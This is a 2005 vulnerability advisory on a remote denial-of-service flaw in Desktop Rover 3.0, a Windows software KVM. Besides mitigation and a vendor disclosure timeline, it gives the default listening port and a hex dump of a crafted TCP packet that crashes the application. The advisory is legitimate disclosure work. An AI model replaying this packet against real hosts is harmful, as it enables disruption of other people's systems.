* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Title: Neslo Desktop Rover Remote DoS Vulnerability
Vendor Homepage: http://www.nelsosoftware.com

Discovered by: Adam Baldwin (evilpacket@ngenuity-is.com)
www.evilpacket.net\advisories\EP-000-0003.html

April 19, 2005


I. INTRODUCTION
Desktop Rover is a software application for Microsoft Windows that
provides the features of a hardware KVM (Keyboard, Video, Mouse).

II. DETAILS
Desktop Rover version 3.0 (and possibly earlier versions) is
vulnerable to a denial of service (DoS). A remote attacker could send
a specially crafted packet to trigger an invalid memory access to
crash the application, resulting in a denial of service.

By default the Desktop Rover listens on port 61427/TCP, it also
conveniently opens up this port in the XP personal firewall.

This packet is an example packet that will cause a denial of service,
there are more variations, but this will suffice for example.

20:23:48.778009 192.168.28.133.32771 > 192.168.28.129.61427: P [tcp sum ok] 
1:13(12) ack 1 win 5840 (DF) (ttl 64, id 24051, len 64)

     4500 0040 5df3 4000 4006 226e c0a8 1c85
     c0a8 1c81 8003 eff3 90a8 d150 7cda 8afa
     8018 16d0 daab 0000 0101 080a 0000 8cbe
     0000 0000 6352 0100 0000 0000 0000 0000


Validated Platforms:
 Windows 2000 Advancded Server [Build 2195, SP4, All Windows Updates]


III. MITIGATING STRATEGY
 The vendor is releasing a fix in version 3.1 soon which will address the 
 vulnerability, until then restricting access to the Desktop Rover ports will 
 reduce the risk of this vulnerability being exploited.

IV. VENDOR COMMUNICATION
 4.14.2005 - Initial vendor contact by e-mail
 4.15.2005 - Initial vendor response
           - Vendor addressed vulnerability
           - Fix confirmed by EvilPacket Security Research
 4.19.2005 - Advisory released

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *